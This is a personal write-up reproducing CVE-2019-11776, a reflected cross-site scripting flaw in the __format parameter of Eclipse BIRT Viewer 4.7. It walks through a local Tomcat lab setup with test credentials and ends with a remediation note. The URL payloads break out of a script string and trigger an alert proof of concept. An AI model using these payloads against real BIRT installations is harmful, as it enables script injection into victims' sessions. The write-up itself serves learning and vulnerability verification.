This is a write-up on public disclosed CVE-2019-11776 where a Cross Site Scripting (Reflected) was found in the __format URL parameter by Vineet Pandey.
So far in my journey, I have done quite a few of Pentesterlab exercises. From these exercises, I learned how important it is to perform a practical testing of any disclosed vulnerabilities as it builds up your system administrative skills (setting up server etc.) and imagine the attack flow for any future applications that you will be testing. You can jump straight into the exploit demonstration first if that interests you more.
Configuring Tomcat
Install Tomcat in your machine (using the exe or zip) and go to the folder location. In this write-up, I am using Tomcat version 8.5. You will find a similar directory as below:
Navigate to the conf folder and open the tomcat-users.xml file (note that the password is for testing and should not be used for production). Add the following lines between the <xml> and <tomcat-users> tag as you need the credentials to login to the manager gui later on.
<role rolename="manager-gui"/>
<user username="tomcat" password"tomcat" roles="manager-gui"/>Configuring BirtViewer
Download BirtViewer (any version that is <= 4.7). I am using version 4.7 for this write-up. You can look for Birt Report Engine (https://download.eclipse.org/birt/downloads/build.php?build=R-R1-4.7.0-201706222054).
After you download the zip file, you should unzip the content into a folder. In this particular folder, look for the WebViewerExample folder.
Copy the entire WebViewerExample folder to Tomcat’s webapps folder. Rename the copied folder to birt-viewer.
Go back to the Tomcat’s bin folder and run the startup script (in Windows, it will be startup.bat. The resources will now be hosted under localhost:8080. Then open the following URL in your browser (http://localhost:8080/manager/html). The credential will be prompted (enter the credential that you earlier used in the tomcat-users.xml file). You should see that birt-viewer is running.
Demonstrating the Vulnerability
After Tomcat and BIRT Viewer are configured, you should open this endpoint:
http://localhost:8080/birt-viewer/frameset?__report=test1.rptdesign&sample=my+parameter
You will see a Parameter UI box appearing. In the CustomerNumber, enter 1 and then click OK. This will generate a report from test1.rptdesign template.
Now click on the print report button (see circled icon in the screenshot below). Choose HTML and click OK.
There will be a new Window popping out and the prompt you to print the report. Now, cancel the print action. What we are interested is the URL of this Window pop-out. Copy this URL and then close the Window.
http://localhost:8080/birt-viewer/output?__report=test1.rptdesign&sample=my+parameter&&__format=html&__pageoverflow=0&__overwrite=falseNow, let’s check how our input is reflected in the HTML page. First, append the following payload in __format parameter:
view-source:http://localhost:8080/birt-viewer/output?__report=test1.rptdesign&sample=my+parameter&&__format=htmlabc&__pageoverflow=0&__overwrite=false
From the HTML source, you can see that our appended payload is appearing in the <script> tag. It seems like the viewer is generating the format string dynamically. If we add abc, then the string will become htmlabc (as seen below).
Now, let’s try to close the html string and then insert another value. You will find that we can actually break out of the format variable to call another method.
view-source:http://localhost:8080/birt-viewer/output?__report=test1.rptdesign&sample=my+parameter&&__format=html%27;abc//&__pageoverflow=0&__overwrite=false
After observing this dynamic creation of string, we can insert an alert payload to confirm that XSS exists in the Birt Viewer.
http://localhost:8080/birt-viewer/output?__report=test1.rptdesign&sample=my+parameter&&__format=html';alert(12345)//&__pageoverflow=0&__overwrite=false
Remediation
Upgrade to at least version 4.8.